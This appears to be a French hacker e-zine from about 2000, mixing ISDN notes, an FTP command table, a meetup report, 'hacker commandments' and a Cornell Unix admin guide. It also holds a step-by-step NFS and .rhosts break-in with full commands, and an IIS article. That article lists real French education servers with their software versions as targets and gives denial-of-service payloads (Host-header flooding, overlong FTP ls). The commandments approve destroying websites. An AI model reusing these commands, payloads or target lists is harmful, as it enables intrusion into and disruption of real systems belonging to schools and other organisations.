Analogiques = courbes (sinusoidales...) mais pas carrees

But :
Integrer dans un meme reseau fonctionnant sur le vocal (l'analogique) d'autres
formes de service de communication.
C'est lui qui assure au sein d'un mem reseau une large gamme de possibilites
d'applications telephonique et non-telephoniques.

Le RNIS vous permet donc d'assurer :
- la connexite numerique
- la modelisation des services
- la polyvalence de l'acces d'usager
- la signalisation hors bande par canal semaphore
- un plan de numerotage integre

La modelisation RNIS s'appuie sur le modele de reference OSI.
Il offre donc des nouveaux services de communication.

L'application pratique la plus emploiee du RNIS est le transfert d'appel
partout dans le monde. C'est aussi grace a lui que l'on peut voir le nom,
adresse et numero de telephone qui vous appelle. Encore lui pour les reunions
a distance... tele-alarme (identification de la personne)...
Mais, a cause de lui, fini les diverses boxs :-(((((((
Pour avoir acces au RNIS, il faut une carte d'interface d'acces au RNIS.

Enfin, on peut associer un tas de plug'ins (services) au RNIS.

Note : Numeris n'est que le RNIS francais.

                                                                          3D13
    ------------------------------------------------
    ----- Detail d'une attaque a partir d'unix -----
    ----------------------------------------------9-
  
  Note aux lamerzzzz : Meme apres avoir lu cet articles, vous serez encore des
lamerz car cette attaque existe depuis longtemps et elle ne sert que d'exemple
mais cependant, elle peut toujours fonctionner sur certainnes machines : cela
vous montre au moins comment il faut proceder pour etablir une attaque.
J'ai fait cet article dans un seul but : rassurer le newbie et faire croire
au lamer qu'il est super-fort-du-genie car il connait au moins UNE attaque qui
peut marcher (au fait tu fait quoi sous linux ? a part frimer ?).

Cette attaque qui servira d'exemple est simplement tiree d'un document, tres
connu, ecrit par Dan Farmer et Wietse Venema intitule : "Improving the
Security of Your Site by Breaking Into it".
Pour attaquer cette cible, il faut qu'elle possede deja ces quelques failles :
        -   Acces a un ftp anonyme
        -   Repertoire d'echange /export/foo
        -   les commandes r* d'activees
> Note : ca fait vraiment un tas de failles, l'admin doit etre nul...
voici l'attaque :

evil # mount victim.com/export/foo /foo
evil # cd /foo
evil # ls -lag
total 3
   1 drwxr-xr-x 11 root      daemon         512 Jun 19 09:47 .
   1 drwxr-xr-x  7 root      wheel          512 Jul 19  1991 ..
   1 drwx--x--x  9 10001     daemon        1024 Aug  3 15:49 guest
evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd
evil # ls -lag
   1 drwxr-xr-x 11 root      daemon         512 Jun 19 09:47 .
   1 drwxr-xr-x  7 root      wheel          512 Jul 19  1991 ..
   1 drwx--x--x  9 guest     daemon        1024 Aug  3 15:49 guest
evil # su guest
evil % echo victim.com >> guest/.rhosts
evil % rlogin victim.com
        Welcome to victim.com
victim %

maintenant vous avez acces a l'utilisateur guest dans la machine :)))
le plus simple pour cette attaque n'est pas que je vous explique car un
hacker est autodidacte et aime chercher les choses tout seul, ni que je vous
laisse totalement tomber.
Voici donc ces quelques indications :
les fichiers commencant par un . (point) sont des fichiers caches unix,
ensuite, les commandes qui commencent par r (rsh, rlogin, .rhost....) sont des
commandes d'acces a distance (remote), rsh = sh a distance (bash a distance).
Pour pouvoir connaitre les commandes tapees ci-dessus, utilisez la commande
"man rpcinfo" pour par exemple connaitre la commande rpcinfo.
Vous voyez que la commande mount peut servir a autre chose qu'a monter des
disquettes et cdroms.

Maintenant, pour continuer a progresser, vous devrez connaitre les
fonctionnement des commandes situees dans /usr/bin et /usr/sbin.

Voila, c'est fini, maintenant j'espere que le chemin s'est un peu eclairci
pour vous, vous voyez que c'est pas dur.
" C'est pas dur quand on sait, bien sur ;-P "

                                                                          3D13

    -----------------------------
    ----- Les commandes FTP -----
    --------------------------10-

  Voici un liste complete des commandes ftp disponibles :

    +---------------------+----------------------------------------------+
    | cd <repertoire>     | Changer de repertoire                        |
    +---------------------+----------------------------------------------+
    | del ou rm <fichier> | Effacer les fichiers specifies du serveur    |
    +---------------------+----------------------------------------------+
    | dir ou ls           | Affiche le repertoire courant, ses           |
    |                     | fichiers et sous-repertoires                 |
    +---------------------+----------------------------------------------+
    | get <fichier>       | Recoit de fichier specifie a partir du       |
    |                     | serveur distant et l'enregistre sous le      |
    |                     | meme nom dans le repertoire courant du       |
    |                     | systeme local; en option vous pouvez         |
    |                     | specifier un nom different pour le fichier   |
    |                     | sur le systeme local : get <fichier> <local> |
    +---------------------+----------------------------------------------+
    | lcd <repertoire>    | Change le repertoire specifie sur le systeme |
    |                     | local.                                       |
    +---------------------+----------------------------------------------+
    | mget <fichiermask>  | Recoit tous les fichiers du serveur distant  |
    |                     | suivant le masque de fichier specifie        |
    +---------------------+----------------------------------------------+
    | mkdir <repertoire>  | (ou md), Cree le repertoire specifie sur le  |
    |                     | serveur distant.                             |
    +---------------------+----------------------------------------------+
    | mput <fichiermask>  | Place tous les fichiers dans le repertoire   |
    |                     | local suivant le masque de fichier specifie  |
    |                     | dans le repertoire courant sur le serveur    |
    |                     | distant                                      |
    +---------------------+----------------------------------------------+
    | prompt              | Active/Desactive le mode interactif          |
    +---------------------+----------------------------------------------+
    | put <fichier>       | Copie le fichier specifie dans le repertoire |
    |                     | local courant sur le repertoire courant du   |
    |                     | serveur distant; vous pouvez aussi changer   |
    |                     | le nom du fichier : put <fichier> <distant>  |
    +---------------------+----------------------------------------------+
    | quit ou exit        | quitte le client                             |
    +---------------------+----------------------------------------------+
    | rmdir <repertoire>  | (ou rd) Supprime le repertoire specifie du   |
    |                     | serveur distant.                             |
    +---------------------+----------------------------------------------+

Voila, mais il y a d'autres commandes tres utiles, mais comme ce sont souvent
des utilitaires que le serveur a lui-meme personnalise, je ne peut plus les
expliquer en standard comme ces commandes ( a connaitre par coeur bien sur :)

    -----------------------------------------------------
    ----- Comment s'est passe notre dernier meeting -----
    ---------------------------------------------------11-

  Meme les agriculteurs on leur meetings alors pourquoi pas nous ?
Pendant les belles vacances de Decembre 1999, nous avons organise un meeting
sur Lyon. Tout s'est tres bien passe.
Il n'y avait pas de lamerz (ooouuuf) ce que je craignais au depart.
Nous sommes alles plaque des affiches pres des campus universitaires pour
attirer du monde. Nous recommencerons volontiers.
Les hackers sont arrives vers 18h00-19h00 et la reunion s'est terminee sur le
coup des minuit (un peu avant pour les bus et metros).
Nous avons parle de tout et rien, mais l'ambiance y etait et c'etait le
principal, certains n'osaient meme pas donner leur pseudo, on s'interpellait
de temps en temps pour discuter dans le but de s'echanger des informations.
La biere a fait quelques ravages (ca veut dire bcp, bcp, bcp de biere ca !!!)
mais le barman etait content de voir autant de monde.
Jolies serveuses... avec tous ces gars les pauvres :))))
En fin de soiree nous nous sommes echanges nos e-mails afin de continuer a se
rencontrer.
Aussi, aucun vrai nom n'a ete prononce (heureusement!) et certains etaient
marrants a voir car ils changeaient tout le temps de pseudo en fonction des
personnes qu'ils cotoyaient.
Voila, c'est ca les ambiances qu'il faut creer pour avoir de bonnes reunions.


    ------------------------------------------
    ----- Les 10 commandements du hacker -----
    ---------------------------------------12-

regles fondamentales du hacker 
les 10 commandements

ceux qui ne respecte pas ces lois ne sont pas des hackers mais des lamerz, une autre espece a 
part a ne pas melanger. 

1) tu ne detruiras points de site ou de pc inocent 
2) faire le menage sur le net=detruire les site raciste pedophile etc...
3) tu ne hacke pas pour l'argent mais pour le sport la connaissance ....
4) ne pas considerer le hack comme une arme mais plutot comme un livre ou l'on peut recolter des 
   tas d'infos interessantes 
5) hacker tous les rats du net(lamerz raciste pedophile etc ...)
6) les progz sont superflus dans le hack le cerveau doit remplacer cela 
7) l'elite doit aider le newbie =)
8) n'avoir aucune confiance en personne car si une personne se fait baiser il peux tres 
   facilement vous balancer
9) ne pas venter ses exploits a un internaute car il peux faire parti de la dst =)
10) ne pas prendre une adresse e-mail du genre hacke_tout@lamerz.com enfin vous voyez le genre

bon voil respecter deja sa! ! c primordiale sinon vous n etes pas digne de porter le nom de 
hacker mais celui de lamerz vous seras plus aproprier =))

                               ~Digital Squad~

    ------------------------------------------
    ----- Academies et serveurs sous IIS -----
    ---------------------------------------13-
par Clad Strife

Introduction: merci a KoSaK sans qui l'article n'aurait jamais ete ecrit.
Rappelons que KoSaK a pirate plusieurs serveurs academiques, ce qui m'a
pousse a m'interesser au sujet. Il etait clair qu'avec des serveurs pirates
a son actif, KoSaK avait trouve quelquechose qui clochait sur ces deux
serveurs. C'est cette chose que je me suis permi de retrouver et
d'approfondir.

Sommaire:

- Etude des serveurs pirates
- Etudes de cas (madchat...)
- Quelques failles sous IIS (sources diverses)

Kosak avait pirate les serveurs academiques de Creteil et d'orleans. Quel est
le point commun entre ces 2 serveurs: quelquechose de precis faisaient qu'ils
etaient vulnerables.
Apres etude du systeme des serveurs j'ai trouve que chacun de ces 2 serveurs
academiques tournait sous IIS 4.0, ce qui pourrait expliquer qu'une faille
ait ete exploite.

Voici une liste des serveurs academiques francais avec la version du serveur,
pour chacun d'entre eux (liste du 03/02/2000):

Academie d'Aix-Marseille:
http://www.ac-aix-marseille.fr
Microsoft IIS 4.0

Academie d'Amiens:
http://www.ac-amiens.fr
Microsoft IIS 4.0

Academie de Besancon:
http://www.ac-besancon.fr
Netscape-Enterprise 3.6 SP2

Academie de Bordeaux:
http://www.ac-bordeaux.fr
Netscape-Enterprise 3.5.1B

Academie de Caen:
http://www.ac-caen.fr
Netscape-Enterprise 3.5.1

Academie de Clermont-Ferrand:
http://www.ac-clermont.fr
Netscape-Enterprise 3.5.1

Academie de la Corse:
http://www.ac-corse.fr
Microsoft IIS 4.0

Academie de Creteil:
http://www.ac-creteil.fr
Microsft IIS 4.0

Academie de Dijon:
http://www.ac-dijon.fr
Netscape-Enterprise 3.6

Academie de Grenoble:
http://www.ac-grenoble.fr
Apache 1.3.6 (Unix) PHP 3.0.12

Academie de Lille:
http://www.ac-lille.fr
Microsoft IIS 4.0

Academie de Limoges:
http://www.ac-limoges.fr
Microsoft IIS 4.0

Academie de Lyon:
http://www.ac-lyon.fr
Netscape-Enterprise 3.6
[Nd 3d13 : acces anonyme = ftp/ftpmaint]

Academie de Montpellier:
http://www.ac-montpellier.fr
Netscape-Enterprise 3.6

Academie de Nancy-Metz:
http://www.ac-nancy-metz.fr	
Microsft IIS 3.0

Academie de Nantes:
http://www.ac-nantes.fr
Netscape-Enterprise 3.5.1

Academie de Nice:
http://www.ac-nice.fr
Microsoft-IIS 3.0

Academie d'Orleans-Tours:
http://www.ac-orleans-tours.fr
Microsoft-IIS 4.0

Academie de Paris:
http://www.ac-paris.fr
Netscape-Enterprise 3.6 SP2

Academie de Poitiers:
http://www.ac-poitiers.fr
Microsoft-IIS 4.0

Academie de Reims:
http://www.ac-reims.fr
Microsoft-IIS 3.0

Academie de Rennes:
http://www.ac-rennes.fr
Microsoft-IIS 3.0

Academie de Rouen:
http://www.ac-rouen.fr
Apache1.3.6 (Unix)  (Red Hat/Linux) PHP 3.0.7

Academie de Strasbourg:
http://www.ac-strasbourg.fr
Netscape-Enterprise 3.5.1

Academie de Toulouse
http://www.ac-toulouse.fr
Apache 1.3.2 (Unix)

Academie de Versailles:
http://www.ac-versailles.fr
Microsoft-IIS 4.0

Entre autres, le serveur de canalweb qui a ete pirater par KoSaK:
http://www.canalweb.net de serveur IIS 4.0.
Et celui de CD Universe, par Maxus:
http://www.cduniverse.com de serveur IIS 4.0

Note: il existe des serveurs Apache disponibles pour differentes
plates-formes. Il est utile d'en connaitre la plate-forme. Il existe aussi
des serveurs Apache pour les systemes Win 9x.

Toutes ces attaques reussies a l'encontre de divers serveurs sous IIS
laissent a penser que KoSaK exploite les failles de ces serveurs. Voici une
liste probablement non exhaustive des failles sur les serveurs IIS de
differentes versions.

Petite astuce: il est possible de connaitre la version d'un serveur en le
forcant a s'identifier! Cela marche pour les serveurs FTP ou HTTP. Il faut
bien se dire que ce ne sont pas parfois les meme.
Exemple Multimania: le serveur http multimania.com est un serveur
Apache 1.3.6 (Unix), et le serveur FTP (hop.multimania.com) est un serveur
Apache 1.3.3 (Unix). La difference est minime mais dans des reseaux plus
vastes il se peut que les serveurs changent radicalement.
Et pour forcer le serveur a se presenter (s'il ne se presente pas des le
debut, comme c'est le cas, en general, en connection FTP) on lui fait rentrer
des commandes erronees qui vous deconnecteront et le feront se presenter.
Exemple madchat.org:
On sait d'avance que le serveur HTTP et FTP reste le meme. Donc on se
connecte sur (utilisez de preference telnet):
www.madchat.org 
port 80
Tapez GET ../.. en premier lieu avant toutes autres commandes.
Si le serveur est de type IIS 4.0 vous allez vous faire deconnecter avec un
message du genre:
HTTP/1.1 400 Demande incorrecte
Serveur: Microsft-IIS/4.0
Date: ...
etc
Dans le cas echeant connectez vous a madchat.org en FTP:
www.madchat.org
FTP
Puis tapez "help":
Soit le serveur se presente directement (qqch FTP microsoft Version 4.0) et
donc vous savez que c du IIS 4.0 soit vous devez faire des commandes de types
syst ou version... bref les possibilites sont multiples.
(A noter que si vous tapez help et que vous voyez toute la liste de commande
s'afficher en collonne, vous pouvez vous douter que c du IIS, car seul IIS
fait aussi mal presente).

Voici une liste non exhaustive de diverses failles existantes sur les
versions des serveurs IIS 5.0, 4.0:
(sources: security focus, rootshell, insecure, Securite Optimale)

IIS 5.0 (ce serveur n'est pas assez developpe, pourtant il est certain que
des failles vont etre decouvertes)

* Vulnerabilite NT IIS ASP: on peut voir le source d'un VBScript lorsqu'une
erreur IIS ASP se produit: recherchez le repertoire d'apres le message
d'erreur. Exemple, le message d'erreur vous dit: "Microsoft VBScript runtime
error '800a0005' Invalid procedure call or argument: 'mid'
/common/browser.inc, line 4..." et vous allez sur
http://www.url.com/common/browser.inc.
* Les requetes de types GET posaient beaucoup de problemes a nos amis de chez
microsoft pour IIS 4.0. Maintenant IIS 5.0 est affectee d'un autre maniere:
une requete de type GET d'un fichier non existant mais dont l'extension est
enregistree IISAPI (ie, .pl, .idq) va creer une erreur faisant que le serveur
va vous retourner un message vous indiquant le repertoire de l'acces root du
serveur. Exemple: CGI Error The specified CGI application misbehaved by not
returning a complete set of HTTP headers. The headers it did return are:
Can't open perl script "C:\InetPub\scripts\ bogus.pl": No such file or
directory

IIS 4.0 (assurement le plus utilse de la gamme microsoft):

* Un utilisateur distant peut acceder a des fichiers proteges si Windows
tronque le nom du fichier lors d'un depassement de imite de caracteres.
Exemple comme vous avez "File~1.com" au lieu de "FileServeur.com". Un appel
distant de la version tronquee peut ainsi etre realisee.
* C'est moins courant, bien sur, mais un serveur IIS 4.0 peut crasher si on
lui fait une requet "GET ../.." sur le port 80 (HTTP).
* Si un serveur ftp contient plus de 100 repertoires ou sites virtuels, il
est facile de faire bugger celui-ci. En effet si une dizaine ou meme plus de
tentatives d'upload ou de suppresion de fichiers sont faites en meme temps,
le serveur repondra: "426 Connection closed; transfer aborted", apres quoi,
si un veritable utilisateur cherche a mettre a jour un fichier, le serveur va
reecrire sur l'ancien fichier avec 0 ko de donnees, ce qui fait que lors de
l'ouverture du fichier un message du style: "File contains no data"
apparaitra. Seul un redemarrage complet du serveur (donc mise hors service du
serveur) permettra de resoudre le probleme.
* Les serveurs FTP IIS 4.0 qui ont installe un post specifique SP5 FTP sont
vulnerables a un exploit ou des personnes non-autorisees peuvent telecharger
ou supprimer des fichiers. pour savoir si le serveur est vulnerable il faut
regarder la version du fichier Ftpsvc.dll: des versions 0718 a 0722 sont
vulnerables.
* Une attaque de type Denial of Service (DoS) peut-etre lance sur un serveur
IIS grace a des requetes malformes du service HTTP, exemple lorsqu'on envoie
beaucoup de "Hos: aaaaa...", la memoire va flancher et pour faire marcher le
service correctement, il faudra faire redemarrer l'ordinateur:
GET / HTTP/1.1
Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)
Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)
...10,000 lines
Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)
* Pour crasher le service inetinfo.exe, sous IIS4.0, il faut se connecter sur
le serveur FTP (sous DOS): enregistrez vous en anonyme sur le serveur ftp et
tapez: ls aaaaaaa...(316 caracteres)...aaa , le service inetinfo.exe va
crasher et la connection redemarrera.
   Il existe d'autres failles mais dans des cas plus specifiques et
relativement a un acces local au serveur, ce que nous n'avons pas toujours.
Si je devais donner un conseil pour vous aider a fixer des patchs pour IIS,
ce serait d'installer un serveur Apache (il en existe pour Win32). ;-)
http://www.multimania.com/hackworldclan pour visiter mon site.

Clad Strife

    -------------------------------------
    ----- New admin unix networking -----
    ----------------------------------14-

Ce document est vraiment tres bien pour les debutants qui veulent commencer,
Il vous montre comment debuter dans l'administration d'un systeme unix.

Unix System Administration and Networking at 
Cornell

Introduction

This document is for novice UNIX system administrators and experienced 
UNIX system administrators who are new to Cornell. It is intended to be 
a simple tutorial and to answer some of the questions that are peculiar 
to administering UNIX systems at Cornell. It assumes some familiarity 
with UNIX. Although most of the information is generic and therefore 
applicable to all Cornell's UNIX systems, some parts are slanted toward 
the Sun operating system. When this is the case, it is stated in the 
document. 

Novice administrators who are unfamiliar with the commands in this 
document can refer to one of many excellent UNIX texts. Several are 
available at the Campus Store and other local bookstores. Recommended 
books are listed at the end of this document.


Before You start

If you are going to be administering a new UNIX workstation that you 
expect to attach to one of Cornell's campus tcp/ip networks, there are 
several things that you can do before your system arrives. These will 
enable you to get your new computer working the day it comes out of 
the box. 

These preliminary actions involve your local network administrator.  
Your Local Area Network (LAN) has a person who is in charge of 
maintaining it. Your department office or the CIT Network Management 
Center (NMC), 5-9900, can tell you who your network administrator is. If 
your department does not have a local network administrator, then you 
will have to work directly with the NMC.  Under no circumstances should 
you connect your computer to the LAN without consulting your network 
administrator.  Together you will need to:

	*	Select a host name and domain name

	*	Get an IP (Internet Protocol) address

	*	Identify the network gateway

	*	Register the workstation's name and address

If you have a twisted-pair ethernet jack installed by CIT Networking 
Resources, you should also have received a piece of paper with the 
internet address, jack number, gateway address and the subnet mask.  If 
the paper is misplaced, call the NMC with your jack number to recieve 
this information.  All that remains is choosing a name and registering it.


Select a Host Name and Domain Name

Your computer needs a unique name.   This name must start with a 
letter and contain only letters, numbers and hyphens [a-z,0-9,-]. Case is 
not important. Remember that you and other people will type this often, 
so don't make it too long. You will probably soon tire of typing 
Saskatchewan!  The name sparky is chosen for future examples in this 
document.

The host name must be unique with it's domain.  Your local network 
administrator can help you verify that your host name is unique within 
the appropriate domain.
A file with the fully qualified domain names and IP addresses of all the 
computers at Cornell is available to assist you.  The file 
~ftp/pub/hosts/hosts is available  via anonymous ftp from 
bigred.cit.cornell.edu.  See appendix A for details.

The host name together with the domain name is called a 'fully 
qualified domain name' that uniquely identifies it to the rest of the 
world.  (eg: sparky.cit.cornell.edu, where sparky is the host name and 
cit.cornell.edu is the domain name).

Domain names (the second part) represent administrative responsibility. 
The main domain at Cornell is, of course, cornell.edu.  Within that main 
domain are several subdomains, for example tn, cit, graphics, and cs.  
The domain name for a computer residing in the cit subdomain is 
cit.cornell.edu.  In general, if your department does not have a separate 
computer support staff, your domain name will be cit.cornell.edu.


Get an IP Address

To connect your computer to a network, you will need an IP address. An 
IP address is a 32-bit number which uniquely identifies your computer 
on the network. It is usually written as four decimal numbers separated 
by dots, (e.g. sparky is assigned address 128.253.180.5). This is called 
dotted-decimal notation.   The first three numbers describe the subnet to 
which you will connect.  The last number is your host (or node) number, 
it is unique for each machine connected to the subnet.  Your local 
network administrator can explain what subnet you will use and assign 
you an unique node address.  


Identify the Network Gateway

Chances are you will want your computer to be able to  communicate 
with other computers who are not on your subnet, indeed the rest of the 
world.  Your local network administrator should provide you with the IP 
address of the gateway of your subnet. You will need the gateway address 
to configure the setup for your computer.  Since this gateway will be  on 
the same subnet as your computer, the first three numbers are the same.  
Only the host (or node) number is different.  (eg:  the gateway of 
sparky's subnet is 128.253.180.1)  Any problems communicating  
through the gateway should be reported to your local network 
administrator. 


Register Your Computer's Name and Address

Once you have your fully qualified domain name (i.e. hostname and 
domainname) and an IP address, you must register it with the 
hostmaster. To register, send electronic mail to 
hostmaster@bigred.cit.cornell.edu with a message in the following 
format. 

HOST : ADDR,ALTERNATE-ADDR (if any): HOSTNAME,NICKNAME : CPUTYPE 
: OPSYS : PROTOCOLS :

Where:

ADDR = internet address in dotted-decimal notation, e.g., 128.253.232.5

ALTERNATE-ADDR=not usually used.  A machine used as a router might 
have two ethernet interfaces and therefor two IP addresses.

HOSTNAME = the fully qualified domain name

NICKNAME = any alias this host is known by (optional)

CPUTYPE = machine type (SUN 4/60, MACCI, VAX-11/780,IBM-PC, etc)

OPSYS = operating system (SUNOS,UNIX, ULTRIX,MACOS, VMS, etc.)

PROTOCOLS = transport/service (TCP/TELNET,TCP/FTP, etc.)

Example:

HOST : 128.253.180.5 : SPARKY.CIT.CORNELL.EDU : SUN4/60 : 
UNIX : TCP/TELNET,TCP/FTP,TCP/SMTP,TCP/FINGER,UDP :

Please note that everything is in uppercase and that there are no spaces 
except around the colons.  Also underscores (_) are not allowed.  The 
template is all on one line,  it is long enough to wrap onto the second 
line as you see here.   But there is no carriage return except at the very 
end. 

This template is available as ~ftp/pub/sysadmin/newhosts.template via 
anonymous ftp from bigred.cit.cornell.edu (128.253.180.2).   A list of 
Cornell hosts in this format is ~ftp/pub/hosts/localhosts.txt also on 
bigred.  This file can give you examples of what your entry should look 
like.  See appendix A for details on how to ftp.




Booting your system

Your new UNIX system is on your desk, you have selected its name, 
received an address, and completed the registration process. Now what 
do you do? The next step involves defining this information in the 
appropriate files on the system. Many UNIX systems have installation 
scripts that prompt you for information such as host name and IP 
address and then automatically modify your /etc/rc scripts. It is a good 
idea to use these if you are new to system administration, but you 
should definitely check the results, because some scripts do the wrong 
thing. For example, Suns set your broadcast address incorrectly.

You should disconnect your machine from the network while setting it 
up. Do not connect your machine to the network until you are fairly 
certain you have made all of the updates listed below. Be sure that your 
network administrator knows that you plan to connect a new machine.

Modifying the rc.local File

The file /etc/rc.local (some systems use rc.boot or rc.tcpip) is a shell 
script file that the system runs at boot time. As the .local part of the file 
name suggests, this is the file that you modify to tailor your system to 
your needs. (NeXT machines have a file called /etc/hostconfig that 
contains variables for all of these fields.)

Here are some commands found in the local script file and explanations 
about how to use them. For these examples, assume that your system is 
called sparky.cit.cornell.edu and your IP address is 128.253.180.5.

The hostname command: The hostname command sets the 
hostname of the system. 
Example:
/bin/hostname sparky.cit.cornell.edu

Your host must be listed in /etc/hosts for this command to work. 
/etc/hosts should contain a line with your IP number, your fully 
qualified domain name, and your host nickname (e.g. sparky). For 
example:

128.253.180.5 sparky.cit.cornell.edu sparky


Furthermore, you must make sure that no other line in /etc/hosts 
contains your hostname. For example, on Ultrix systems, /etc/hosts may 
contain a line like:

127.0.0.1 sparky

Change this to:

127.0.0.1 localhost

Anytime you copy an /etc/hosts file from another machine, be sure to 
check that it contains the correct address for your local host.



The ifconfig command: The ifconfig command is used to configure 
your network interface. 

Example:

		ifconfig le0 `hostname` netmask 255.255.255.0 \	 
		-broadcast 128.253.180.255 -trailers up

This command configures the network interface called le0. The name of 
the interface will be different on other types of systems (Sun : le0, NeXT : 
en0, DECstation : ln0). The command has several parts:

Address:(`hostname`)
Associates sparky's IP address with this interface.

Netmask: (netmask 255.255.255.0)
(Some times written "0xffffff00")
Sets the netmask to an 8-bit subnet.  This tells the networking software 
on your computer that any IP address with the same first three bytes (ie. 
the first three numbers in the dotted-decimal notation) is on your local 
network (called a subnet) and that the packet attached to it doesn't 
need to be sent to the subnet gateway.

If CIT/NR has indicated that your network has sub-subnetting, then your 
netmask will be 0xffffffc0 which translates to 255.255.255.192.

Broadcast address: (broadcast 128.253.180.255)
Sets the broadcast address. The broadcast address is the address that 
every computer on the network listens to.  It must be the subnet address 
with .255 in the host portion of the address.

Trailers: (-trailers)
The minus sign in front means to turn trailers off. Trailers were an 
attempt at a performance increase on VAXen.  They were difficult to 
implement, and thus were often implemented incorrectly.  It is a good 
idea to turn them off.

Up: (up)
Turns the network interface on.

Routing Packets

To 'talk to' computers that are not on your local area network, your 
computer needs to know where to send packets. (UNIX uses a 
combination of the IP address and netmask to determine if the target 
host is on the local network or not.)

You can route packets in one of two ways:

1.	Run routed. Routed (or gated) is a daemon process that listens to 
RIP (Routing Information Protocol). Many systems run routed by 
default, but unless your network has multiple gateways, with routes 
changing frequently and dynamically between the gateways, you do 
not need to run routed (or gated). If you choose to run routed, you 
will almost certainly want to give it the '-q' option.

OR 

2.	Set a default route. Setting a default route tells your computer: 'If 
you don't know where to send a packet, send it here!' To do this, 
find the address of your gateway (ask your network administrator for 
it) and add the following command to rc.local: 

route add default gatewayaddress hopcount

	For example, if your gateway address is 128.253.180.1, add:

route add default 128.253.180.1 1

	It is also a good idea to configure your loopback interface with the 
following commands:

			ifconfig lo0 127.0.0.1
			route add 'hostname' 127.0.0.1 0

After completing all of the above steps, you may safely connect your 
UNIX workstation to the network.

Operational Issues

When your computer is up and running on the network, you need to be 
aware of operational issues. 

Name Resolution

When you use the network to send electronic mail, you will use the 
receiving host's name in the address. Your computer, however, needs to 
process the mail based on the receiving host's IP address. The process of 
translating host names to IP addresses is called resolving an address. 
There are several ways to do this. You can:

	*	Keep files with name to address mappings (static /etc/hosts 
tables).

	*	Ask another 'well known' computer for the information 
(name server).

	*	Do a combination of these.

In general, static host tables are a bad idea. But, in order to boot, you 
need to at least list your local host (your own computer) and perhaps 
several local machines that you might need to contact if you are having 
trouble booting. For example, if you build a new kernel that doesn't 
work, it is handy to download one from another machine.

Accessing a name server for host address information is a better idea. If 
you must use static host tables, they are available via anonymous ftp 
from bigred.cit.cornell.edu in the ~ftp/pub/hosts directory. There are 
also some shell scripts to automate this in the file 
~ftp/pub/sysadmin/fetchhosts.tar.

The simplest way to use a name server is to use a resolver that knows 
how to talk to a name server. A resolver is simply a set of library calls of 
the form gethostby*(). These are the calls that network programs (e.g. 
telnet, rsh) make when trying to resolve host names into IP addresses. 
The resolver routines read a file called /etc/resolv.conf. This file should 
list your domain and the IP addresses of up to three name servers. Here 
is a sample /etc/resolv.conf for the machine sparky.cit.cornell.edu 
(128.253.180.5).  The nameservers should be listed from closest to 
farthest away.  If your subnet has it's own name server, that should be 
listed first.

--------------- begin file -----------------
#
# /etc/resolv.conf
#
# list of nameservers
#bigred.cit.cornell.edu	128.253.180.2
#nmc.cit.cornell.edu	128.253.180.180
#dns.cit.cornell.edu		192.35.82.50
#
domain 	cit.cornell.edu
nameserver	128.253.180..2
nameserver	128.253.180.180
nameserver	192.35.82.50
--------------- end of file -----------------

NOTE:  If your machine is in a different domain than cit.cornell.edu, you 
should change the domain line to reflect your domain.  In this case the 
order of nameservers might be different, check with your local network 
administrator.

Getting your network applications to use the resolver is operating system 
dependent. Here are several ways:

1.	Ultrix - The file /etc/svc.conf defines the order of name resolution 
methods. Add the bind option if it is not specified, the local option 
specifies using the /etc/hosts file.  Only add the yp option if you 
plan to configure and use yp.  E.g. "hosts=bind,local" or 
'hosts=bind,local,yp'.

2.	Sun - The Sun Operating System uses shared libraries. You need to 
install a new dynamic library in /usr/lib. One is available from 
bigred in ~ftp/pub/sysadmin. (See instructions in libc.README).  If 
YP is used, then this library is not needed (post SunOS 4.x)

3. NeXT - Netinfod uses /etc/resolv.conf automatically without further 
setup.

Another way to resolve names is to run a caching name server.  A 
caching name server doesn't keep any files around with host information 
in them, but will act as a proxy to other name servers for you. Each time 
you ask it for an address that it doesn't know, it will ask another name 
server for the information. It will remember (i.e. cache) this address for 
some time, so that the next time you ask it for that address, it will 
respond quickly. With this method, you must still set up your resolver, 
but the first name server you list in your /etc/resolv.conf should be the 
localhost (i.e. 127.0.0.1). The configuration files for a caching name 
server are available for anonymous ftp from bigred in 
~ftp/pub/sysadmin/nameserver.tar.

Finally, if you have many machine on your local subnet, you may 
consider running a secondary name server. A secondary name server 
queries the primary name server for a list of every host that it knows 
about and keeps this information on disk. Then it is able to answer with 
address information for any host in your domain.  If you are interested, 
read about the BIND nameserver software in section 14.9 of  the"UNIX 
system administration handbook" by Nemeth.  See the reference section.

Time

In a networked environment, especially if you use Network File System 
(NFS), it is important that you synchronize time across all of your 
computers. There are two ways of doing this: running a Network Time 
Protocol daemon (ntpd) or querying a time server once or twice a day. 

Ntpd (started at boot time) runs some very sophisticated algorithms to 
keep your computer's clock in line with a time server. There are three 
'stratum 2' time servers on campus: ntp[0,1,2].cornell.edu. These 
'stratum level' clocks are synchronized carefully with a very accurate 
clock on campus. 

Instead of running the ntpd, you can check the time once a day using 
ntp 
(eg: ntp -s ntp1.cornell.edu).  Ultrix and NeXT come with ntp installed, 
there is an implementation of ntp for other systems available from 
bigred in the file ~ftp/pub/sysadmin/xntp.tar.

Some SunOS installations prefer to run rdate (SunOS utility) once a day 
to query the main time server.

Mail

The main mail configuration file is called /etc/sendmail.cf. Writing 
sendmail.cf files is considered a bit of a 'Black Art' and is beyond the 
scope of this document. There is a sendmail.cf for anonymous ftp on 
ftp.cit.cornell.edu in ~ftp/pub/unix/sysadm/sendmail.cf. Edit this 
file, and follow the instructions in the comments.

Make sure to set up aliases for both postmaster and root in your 
/usr/lib/aliases file that point to you. This is a requirement.


Recommended UNIX Texts

*	UNIX System Administration Handbook; Nemeth, Snyder,Seebass; 
Prentice Hall, Inc.

	An attempt to condense everything a system administrator should 
know about UNIX into one volume.  Provides detailed understanding 
of why each system administration task is important.

*	A Practical Guide to the UNIX System, Mark G. Sobel, 
Benjamin/Cummings Publishing Co., Inc.

	This book addresses UNIX System V and Berkeley UNIX. Topics 
covered include electronic mail, vi screen editor, and shell 
programming. It includes a tutorial and descriptions and examples 
of utility programs.

*	The Waite Groups UNIX Primer Plus, Waite, Martin and Prata.

	This book is easy to read. It covers both the vi and emacs screen 
editors.

*	The UNIX Programming Environment, Kernighan and Pike.

	This book is oriented toward UNIX programmers. It is considered a 
classic among UNIX experts.

*	UNIX for VMS Users, Philip E. Bourne, Digital Press VAX Users Series

	This book is designed for people familiar with the VMS operating 
system.


Help

If you need assistance with any of the tasks outlined in this document, 
contact:

